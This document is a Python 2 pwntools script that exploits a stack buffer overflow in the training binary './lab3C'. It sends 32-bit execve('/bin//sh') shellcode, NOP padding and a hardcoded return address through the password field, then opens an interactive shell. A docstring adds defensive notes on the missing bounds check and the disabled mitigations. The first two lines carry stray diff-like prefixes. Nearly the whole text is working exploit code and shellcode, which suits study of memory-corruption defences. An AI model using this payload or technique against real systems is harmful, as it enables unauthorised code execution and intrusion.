- from pwn import *
- import time
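def hackIt():
    """Drive the local ``./lab3C`` training binary with an oversized password.

    The script starts ``./lab3C`` as a child process, prints its PID and
    waits for Enter so a debugger can be attached, sends the username,
    waits for the password prompt, and then sends a password made of three
    parts: a 23-byte 32-bit Linux ``execve("/bin//sh")`` stub, 0x90 filler
    up to 0x50 bytes, and a little-endian 32-bit address.

    Review notes (defensive reading):
      * The password field is evidently copied without a length check --
        presumably the saved return address sits 0x50 bytes past the start
        of the buffer; confirm against the lab source.
      * The technique depends on an executable stack and a fixed stack
        address. A non-executable stack (NX/DEP), ASLR, or a stack canary
        each break it, so the binary is presumably built with them off.
      * The fix in the target is a bounded read into the password buffer.

    Written for Python 2 and pwntools (``process``, ``p32`` come from
    ``from pwn import *``).
    """
    # Placeholder stack address left by the author. The original line used
    # a C-style "//" comment, which Python parses as floor division and
    # rejects as a syntax error; "#" is the comment marker.
    address_shellcode = 0xffffd5fc  # fix this address
    username = "rpisec"

    r = process("./lab3C")

    # Pause so a debugger can be attached to the child before any input.
    print "attach %d\ndebug?" % r.pid
    raw_input()

    # r.recvuntil("Enter Username: ")
    r.sendline(username)
    r.recvuntil("Enter Password: ")

    # 23-byte x86 stub: pushes "/bin//sh" and issues int 0x80 with eax=0x0b.
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

    payload = shellcode
    # Filler up to 0x50 bytes; 0x90 is the one-byte x86 NOP.
    payload += "\x90"*(0x50-len(shellcode))
    # Four bytes that land past the 0x50-byte region, packed little-endian.
    payload += p32(address_shellcode)

    r.sendline(payload)
    r.interactive()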
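# Run only when executed as a script, so that importing this module does
# not spawn the target process as a side effect.
if __name__ == "__main__":
    hackIt()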